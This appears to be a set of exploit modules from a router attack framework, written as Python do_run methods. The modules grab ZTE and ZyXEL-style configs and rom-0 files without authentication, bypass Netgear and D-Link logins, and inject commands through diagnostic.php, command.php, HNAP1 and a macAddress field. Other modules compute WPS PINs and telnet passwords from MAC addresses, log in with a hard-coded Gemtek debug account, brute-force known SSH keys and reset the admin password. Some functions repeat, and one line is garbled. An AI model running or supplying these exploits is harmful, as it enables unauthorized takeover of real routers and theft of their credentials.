    A 200 carrying a ``Content-Disposition`` header is taken to mean the
    body is the config file, which is saved locally as ``config.bin``.
    """
    url = "http://%s:%s/getpage.gch?pid=101&nextpage=manager_dev_config_t.gch" % (self.host, self.port)
    try:
        print_warning("Sending exploit")
        # It took me longer than necessary to find out how to use Content-Disposition properly
        # Always set stream=True otherwise you may not get the whole file
        response = requests.post(url, files={'config': ''}, timeout=60, stream=True)
        if response.status_code == 200:
            if response.headers.get('Content-Disposition'):
                print_success("got file in response")
                print_info("Writing file to config.bin")
                # response.content reads the streamed body in full.
                core.io.writefile(response.content, "config.bin")
                print_success("you can now use decryptors/zte/config_zlib_decompress to extract XML")
            # A 200 without Content-Disposition produces no output.
    # NOTE(review): 'as e' shadows the method's 'e' parameter.
    except requests.ConnectionError as e:
        print_error("connection error %s" % e)
    except requests.Timeout:
        print_error("timeout")
def do_run(self, e):
    """Attempt the Netgear ``BRS_netgear_success.html`` authentication bypass.

    If the root page answers 401, the success page is requested three
    times (one second apart) and the root page is fetched again; a 200 is
    reported as a successful bypass.
    """
    # self.port is concatenated, so it must be a str here.
    target = "http://" + self.host + ":" + self.port
    try:
        response = requests.get(target, timeout=60)
        if response.status_code == requests.codes.unauthorized:
            print_yellow("Password protection detected")
            for i in range(0, 3):
                time.sleep(1)
                requests.get(target + "/BRS_netgear_success.html", timeout=60)
            response = requests.get(target, timeout=60)
            if response.status_code == requests.codes.ok:
                print_success(
                    "bypass successful. Now use your browser to have at look at the admin interface."
                )
            # A root page that is not 401 to begin with produces no output at all.
    except requests.RequestException:
        # Catches every requests error, not only timeouts, despite the message.
        print_error("timeout!")
def do_run(self, e): f = open(self.input_file, 'rb') # These should be offsets of spt.dat but it somehow works with these values usually, # the core.compression.lzs is not a very good implementation, it won't decompress the whole file correctly # but it's enough to to extract admin password fpos = 8568 fend = 8788 f.seek(fpos) amount = 221 while fpos < fend: if fend - fpos < amount: amount = amount data = f.read(amount) fpos += len(data) result, window = core.compression.lzs.LZSDecompress(data) print_info("Printing strings found in decompressed data (admin password is usually the first found):") for s in interface.utils.strings(result): print_success(s)
def do_run(self, e):
    """Retrieve the device configuration via an empty multipart POST to ``manager_dev_config_t.gch``.

    A 200 carrying a ``Content-Disposition`` header is taken to mean the
    body is the config file, which is saved locally as ``config.bin``.
    """
    url = "http://%s:%s/getpage.gch?pid=101&nextpage=manager_dev_config_t.gch" % (self.host, self.port)
    try:
        print_yellow("Sending exploit")
        # It took me longer than necessary to find out how to use Content-Disposition properly
        # Always set stream=True otherwise you may not get the whole file
        response = requests.post(url, files={'config': ''}, timeout=60, stream=True)
        if response.status_code == 200:
            if response.headers.get('Content-Disposition'):
                print_success("got file in response")
                print_yellow("Writing file to config.bin")
                # response.content reads the streamed body in full.
                core.io.writefile(response.content, "config.bin")
                print_success("you can now use decryptors/zte/config_zlib_decompress to extract XML")
            # A 200 without Content-Disposition produces no output.
    # NOTE(review): 'as e' shadows the method's 'e' parameter.
    except requests.ConnectionError as e:
        print_error("connection error %s" % e)
    except requests.Timeout:
        print_error("timeout")
def do_run(self, e):
    """Fetch ``self.file`` from the target with a bare prepared GET and save it under the same name.

    The request is prepared and sent through a Session directly (see the
    author's note about a preceding HEAD); on 200 the text body is written
    to a local file named ``self.file``.
    """
    target = "http://%s:%s/%s" % (self.host, self.port, self.file)
    try:
        # We have to manually craft the request if you use requests.get it sents HEAD first
        # and the exploit won't work
        request = requests.Request('GET', target)
        r = request.prepare()
        s = requests.Session()
        response = s.send(r, timeout=30)
        s.close()
        if response.status_code == 200:
            print_success("writing to file%s" % self.file)
            # NOTE(review): self.file is reused unchanged as the local path; a value with
            # directory components would be written there — confirm writetextfile sanitises it.
            core.io.writetextfile(response.text, self.file)
        else:
            print_error("exploit probably failed got response code %s" % response.status_code)
    except requests.RequestException:
        # Catches every requests error, not only timeouts, despite the message.
        print_error("timeout!")
def do_run(self, e):
    """Fetch ``/hidden_info.html``, save it locally and print the values found in its ``str=([{...}`` block.

    Success is detected by the phrase ``Manufacture Information`` in the
    body; the JSON-like block is split on commas and printed line by line.
    """
    url = "http://%s:%s/hidden_info.html" % (self.host, self.port)
    try:
        print_warning("Sending exploit")
        response = requests.get(url, timeout=60)
        if "Manufacture Information" in response.text:
            print_success("information obtained, writing response into hidden_info.html")
            core.io.writetextfile(response.text, "hidden_info.html")
            print_warning("Please check file, response seems to depend on FW version, parsing may not be accurate")
            # Non-raw pattern: the '\(' etc. escapes reach re unchanged, but value[0]
            # raises an uncaught IndexError when the page layout differs.
            value = re.findall("str =\(\"\[\{(.*)\}", response.text)
            value = value[0].split(',')
            for i in value:
                print_green(i)
        else:
            print_error("exploit failed")
    except requests.Timeout:
        print_error("timeout")
    except requests.ConnectionError:
        print_error("exploit failed")
def do_run(self, e):
    """Print the WPS PIN derived from the last six hex digits of ``self.mac``.

    The seven-digit base is the lower 24 bits of the MAC modulo 10^7; the
    eighth digit is the standard WPS checksum (weights 3,1,3,1,... over the
    digits, least significant first).
    """
    normalised = self.mac.upper().replace("-", "").replace(":", "")
    base = int(normalised[6:], 16) % 10000000
    remaining, weighted_sum = base, 0
    while remaining:
        remaining, digit = divmod(remaining, 10)
        weighted_sum += 3 * digit
        remaining, digit = divmod(remaining, 10)
        weighted_sum += digit
    check_digit = (10 - weighted_sum % 10) % 10
    print_success("")
    print_green("WPS pin:" + "%07d%d" % (base, check_digit))
def do_run(self, e):
    """Download ``/rom-0`` from the target without authentication and check whether ``/rpFWUpload.html`` is reachable.

    The rom-0 body is saved as ``rom-0`` only when the server returns 200
    with ``Content-Type: application/octet-stream``.
    """
    # self.port is concatenated, so it must be a str here.
    target = "http://" + self.host + ":" + self.port
    try:
        response = requests.get(target + "/rom-0", timeout=60)
        content_type = 'application/octet-stream'
        # Exact header comparison: a charset suffix or different casing would not match.
        if response.status_code == requests.codes.ok and response.headers.get(
                'Content-Type') == content_type:
            print_success("got rom-0 file, size:" + str(len(response.content)))
            core.io.writefile(response.content, "rom-0")
        else:
            print_error("failed")
        print("Checking if rpFWUpload.html is available")
        response = requests.get(target + "/rpFWUpload.html", timeout=60)
        if response.status_code == requests.codes.ok:
            print_success("rpFWUpload.html is accessible")
        else:
            print_failed("rpFWUpload.html is not accessible")
    except requests.RequestException:
        # Catches every requests error, not only timeouts, despite the message.
        print_error("timeout!")
def do_run(self, e):
    """Send a blind command-injection request through the ``dst`` field of ``/diagnostic.php``.

    Only the presence of ``<report>OK</report>`` in the reply is checked;
    the command's output is never returned by the target.
    """
    url = "http://%s:%s/diagnostic.php" % (self.host, self.port)
    # self.command is placed inside the ping destination field between '&' separators.
    payload = {'act': 'ping', 'dst': '& %s&' % self.command}
    headers = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
               # NOTE(review): the value repeats the header name; sent verbatim as-is.
               'Accept-Language': 'Accept-Language: en-us,en;q=0.5',
               'Accept-Encoding': 'gzip, deflate',
               'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8'
               }
    try:
        print_warning("Sending exploit")
        response = requests.post(url, headers=headers, data=payload, timeout=60)
        # Success marker only proves the request was accepted, not that the command ran.
        if "<report>OK</report>" in response.text:
            print_success("output not available this is blind injection")
        else:
            print_error("could not find marker in response, exploit failed")
    except requests.Timeout:
        print_error("timeout")
    except requests.ConnectionError:
        print_error("exploit failed")
def do_run(self, e):
    """Print the root telnet password derived from ``self.mac``.

    Each of the eight password characters comes from ``self.mash`` applied
    to a fixed pair of (lower-cased) MAC hex digits.
    """
    digits = [c.lower() for c in self.mac.upper().replace("-", "").replace(":", "")]
    # Index pairs feeding mash(), in output order.
    pairs = ((5, 11), (0, 2), (10, 11), (0, 9), (10, 6), (3, 9), (1, 6), (3, 4))
    password = "".join(self.mash(digits[a], digits[b]) for a, b in pairs)
    print_success("")
    print_green("Telnet password for root is: " + password)
def do_run(self, e):
    """Generate the ``__super`` credentials from a colon-separated ``self.mac``.

    Five sums of adjacent octets, then three sums of adjacent octets plus
    0xF, are fed in order to ``self.printchar``, which is expected to build
    up ``self.password``.
    """
    octets = [int(part, 16) for part in self.mac.split(":")]
    for idx in range(5):
        self.printchar(octets[idx] + octets[idx + 1])
    for idx in range(3):
        self.printchar(octets[idx] + octets[idx + 1] + 0xF)
    print_success('credentials generated')
    print("Username: __super")
    print("Password: " + self.password)
def do_run(self, e):
    """Generate the ``__super`` credentials from a colon-separated ``self.mac``.

    Five sums of adjacent octets, then three sums of adjacent octets plus
    0xF, are fed in order to ``self.printchar``, which is expected to build
    up ``self.password``.
    """
    octets = [int(part, 16) for part in self.mac.split(":")]
    for idx in range(5):
        self.printchar(octets[idx] + octets[idx + 1])
    for idx in range(3):
        self.printchar(octets[idx] + octets[idx + 1] + 0xF)
    print_success('')
    print_green("Username: __super")
    print_green("Password: " + self.password)
def do_run(self, e):
    """Check for and use the ``ui_debug`` command interface of ``/debug.cgi``.

    Authenticates with the fixed basic-auth pair in the code (presumably a
    built-in account of the target — confirm), sends ``echo 741852`` as a
    canary and, only if it is echoed back, submits ``self.command`` and
    prints the output captured from the ``<textarea>``.
    """
    url = "http://%s:%s/debug.cgi" % (self.host, self.port)
    data = {"data1": "echo 741852", "command": "ui_debug"}
    try:
        response = requests.post(url=url, data=data, auth=("Gemtek", "gemtekswd"), timeout=60)
        # NOTE(review): when the pattern does not match, result[0] raises IndexError,
        # which is not among the exceptions handled below (only TypeError is).
        result = re.findall("<textarea rows=30 cols=100>\\n(.*)\\n</textarea>", response.text)
        if "741852" == result[0]:
            print_success("Target is vulnerable")
            data = {"data1": self.command, "command": "ui_debug"}
            response = requests.post(url=url, data=data, auth=("Gemtek", "gemtekswd"), timeout=60)
            result = re.findall("<textarea rows=30 cols=100>\\n(.*)\\n</textarea>", response.text)
            print(result[0])
        else:
            print_error("target is not vulnerable")
    except requests.Timeout:
        print_error("timeout")
    except requests.ConnectionError:
        print_error("exploit failed")
    except TypeError:
        print_error("Something went wrong in answer parsing")
def do_run(self, e):
    """Find an injectable script among ``self.files`` with a time-based check, then send ``self.command``.

    For each candidate file a request carrying ``sleep 10`` is timed; a
    200 containing ``Update Success!`` stops the search (the timing result
    only changes the message).  The command is then sent through the same
    parameter of the selected file.
    NOTE(review): the source as received had no indentation; the placement
    of ``break`` inside the status check was reconstructed — confirm upstream.
    """
    file = ""
    for file in self.files:
        print_info("Testing file: " + file)
        # NOTE(review): the '®' in this URL looks like an HTML-entity decoding artifact
        # in the text as received; confirm the query string against the upstream module.
        url = "http://%s:%s/%s?writeData=true®info=0&macAddress= 001122334455 -c 0 ;" \
              "%s; echo #" % (self.host, self.port, file, "sleep 10")
        try:
            print_info("Doing timebased check with sleep 10")
            time_start = datetime.datetime.now()
            response = requests.get(url=url, timeout=60)
            time_end = datetime.datetime.now()
            delta = time_end - time_start
            if response.status_code == 200 and "Update Success!" in response.text:
                # Expected window for a 10 s sleep plus network overhead.
                if 13 > delta.seconds > 9:
                    print_success("Timebased check OK target should be vulnerable")
                else:
                    print_warning("Timebased check failed, but target still might be vulnerable")
                break
        except requests.Timeout:
            print_error("timeout")
        except requests.ConnectionError:
            print_error("exploit failed")
    # NOTE(review): reached also when no file matched; 'file' is then the last candidate.
    print_success("Vulnerable file:" + file)
    print_info("Sending command")
    url = "http://%s:%s/%s?writeData=true®info=0&macAddress= 001122334455 -c 0 ;" \
          "%s; echo #" % (self.host, self.port, file, self.command)
    try:
        response = requests.get(url=url, timeout=60)
        if response.status_code == 200 and "Update Success!" in response.text:
            print_success("command sent")
    except requests.Timeout:
        print_error("timeout")
    except requests.ConnectionError:
        print_error("target stopped responding or you issued reboot or killed lighttpd")
def do_run(self, e):
    """Send ``self.command`` to ``/command.php`` and print the output returned.

    The form body is built by hand with ``urllib.parse.quote`` (only ``/``
    and ``=`` left unencoded) because ``requests`` would otherwise encode
    the whole dict; the marker ``end`` appended to the command is then
    searched for in the response.
    """
    url = "http://%s:%s/command.php" % (self.host, self.port)
    payload = {'cmd': '%s; echo end' % self.command}
    headers = {
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language': 'Accept-Language: en-us,en;q=0.5',
        'Accept-Encoding': 'gzip, deflate',
        'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8'
    }
    try:
        print_yellow("Sending exploit")
        # Requests forces URI encoding and can't be turned off
        # so we have to prepare HTTP request manually and modify it with urllib.parse.quote before sending
        request = requests.Request('POST', url, headers=headers, data=payload)
        r = request.prepare()
        # print("Before modification:", r.body)
        r.body = urllib.parse.quote('cmd=%s; echo end' % self.command, safe='/=')
        # NOTE(review): header value is an int, not a str — confirm the HTTP stack accepts it.
        r.headers.update({'Content-Length': len(r.body)})
        # print("After modification:", r.body)
        s = requests.Session()
        response = s.send(r, timeout=15)
        s.close()
        # This won't work
        # response = requests.post(url, headers=headers, data=payload, proxies=proxies, timeout=60)
        # NOTE(review): the check is for the substring "end" (not the "end8758" the
        # comment mentions), so any page containing "end" passes.
        if "end" in response.text:  # end8758 is unique tag to search for in output
            print_success("output of %s:" % self.command)
            print_green(response.text)
        else:
            print_error(
                "could not find marker in response, exploit failed")
    except requests.Timeout:
        print_error("timeout")
    except requests.ConnectionError:
        print_error("exploit failed or you killed httpd")
def do_run(self, e):
    """Try each SSH private key stored in ``databases/bad_keys.db`` against ``self.host``.

    Rows are (user, port, filename, type, private_key).  RSA and DSA keys
    are loaded with paramiko and used for a key-only login; on success the
    key material is written to ``<filename>.key``.
    """
    print_info("Testing known keys")
    client = paramiko.SSHClient()
    # AutoAddPolicy trusts whatever host key the server presents (no verification).
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    # NOTE(review): neither the connection nor the cursor is closed afterwards.
    connection = core.loader.open_database("./databases/bad_keys.db")
    cursor = connection.cursor()
    cursor.execute(
        "SELECT user, port, filename, type, private_key FROM keys;")
    entries = cursor.fetchall()
    for entry in entries:
        try:
            username = entry[0]
            port = entry[1]
            filename = entry[2]
            key_type = entry[3]
            string_key = entry[4]
            if key_type == 'RSA':
                private_key = paramiko.RSAKey.from_private_key(
                    io.StringIO(string_key))
            elif key_type == 'DSA':
                private_key = paramiko.DSSKey.from_private_key(
                    io.StringIO(string_key))
            else:
                print_error("Failed to load key of type:", key_type)
                continue
            client.connect(self.host, port=port, username=username, pkey=private_key, look_for_keys=False, timeout=10)
            # The key is stored under the database filename with a ".key" suffix.
            core.io.writetextfile(string_key, filename + ".key")
            # NOTE(review): this line is garbled in the source as received ('******'); kept verbatim.
            print_success("Username:"******"port:", port)
            print_info("Private key writen to:", filename + ".key")
            # Only closed on the success path; the loop keeps trying the remaining keys.
            client.close()
        except paramiko.AuthenticationException:
            pass
        # NOTE(review): a bare except also swallows KeyboardInterrupt and any
        # programming error (e.g. a malformed row), so failures are invisible.
        except:
            pass
def do_run(self, e):
    """Send ``self.command`` inside the HNAP1 ``SOAPAction`` header (backtick substitution).

    A ``ConnectionError`` after the POST is interpreted as success
    (apparently the default payload is expected to stop httpd); the
    operator is then offered a telnet session to dump ``/var/config.xml``.
    """
    url = "http://%s:%s/HNAP1" % (self.host, self.port)
    headers = {"SOAPAction": '"http://purenetworks.com/HNAP1/GetDeviceSettings/`%s`"' % self.command}
    try:
        print_yellow("Sending exploit")
        requests.post(url, headers=headers, timeout=60)
        print_yellow("HTTPd is still responding this is OK if you changed the payload")
    except requests.ConnectionError:
        print_success("exploit sent.")
        answer = query_yes_no("Do you wish to dump all system settings? (if telned was started)")
        if answer is True:
            # NOTE(review): telnet uses self.port, i.e. the same port as the HTTP
            # request above — confirm that is intended. telnetlib was removed from
            # the standard library in Python 3.13.
            tn = telnetlib.Telnet(self.host, self.port)
            print_yellow("Sending command through telnet")
            tn.read_until(b'#', timeout=15)
            tn.write(b"xmldbc -d /var/config.xml; cat /var/config.xml\n")
            # read_until returns whatever arrived within the timeout, possibly truncated.
            response = tn.read_until(b'#', timeout=15)
            tn.close()
            print_yellow("Writing response to config.xml")
            # decode('ascii') raises UnicodeDecodeError on non-ASCII config content.
            writetextfile(response.decode('ascii'), "config.xml")
        print_yellow("Don't forget to restart httpd or reboot the device")
    except requests.Timeout:
        print_error("timeout")
def do_run(self, e):
    """Check the ``NO_NEED_AUTH=1&AUTH_GROUP=0`` authentication bypass and, if present, set a new admin password.

    The GET on ``tools_admin.php`` counts as vulnerable when it returns 200
    and contains the password form; the same bypass parameters are then
    POSTed together with ``self.password`` for user ``admin``.
    """
    url = "http://%s:%s/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0" % (self.host, self.port)
    try:
        print_warning("Sending exploit")
        response = requests.get(url, timeout=60)
        if response.status_code == 200 and 'name="admin_password1"' in response.text:
            print_success("target seems vulnerable")
            print_success("You can visit any page by adding ?NO_NEED_AUTH=1&AUTH_GROUP=0 to URL")
            print_info("Changing admin password")
            headers = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                       'Accept-Language': 'Accept-Language: en-us,en;q=0.5',
                       'Accept-Encoding': 'gzip, deflate',
                       'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8'
                       }
            payload = {'NO_NEED_AUTH': 1,
                       'AUTH_GROUP': 0,
                       'ACTION_POST': 1,
                       'apply': 'Save+Settings',
                       'admin_name': 'admin',
                       'admin_password1': '%s' % self.password,
                       'admin_password2': '%s' % self.password,
                       'grap_auth_enable_h': 0,
                       'rt_ipaddr': '0.0.0.0'}
            url = "http://%s:%s/tools_admin.php" % (self.host, self.port)
            # This POST changes the device's admin password; nothing here reverts it.
            response = requests.post(url=url, headers=headers, data=payload, timeout=60)
            # A 200 only shows the form was accepted, not that the password was applied.
            if response.status_code == 200:
                print_success("password seems to be changed try to login with: %s" % self.password)
            else:
                print_error("password change failed")
        else:
            print_error("exploit failed")
    except requests.Timeout:
        print_error("timeout")
    except requests.ConnectionError:
        print_error("exploit failed")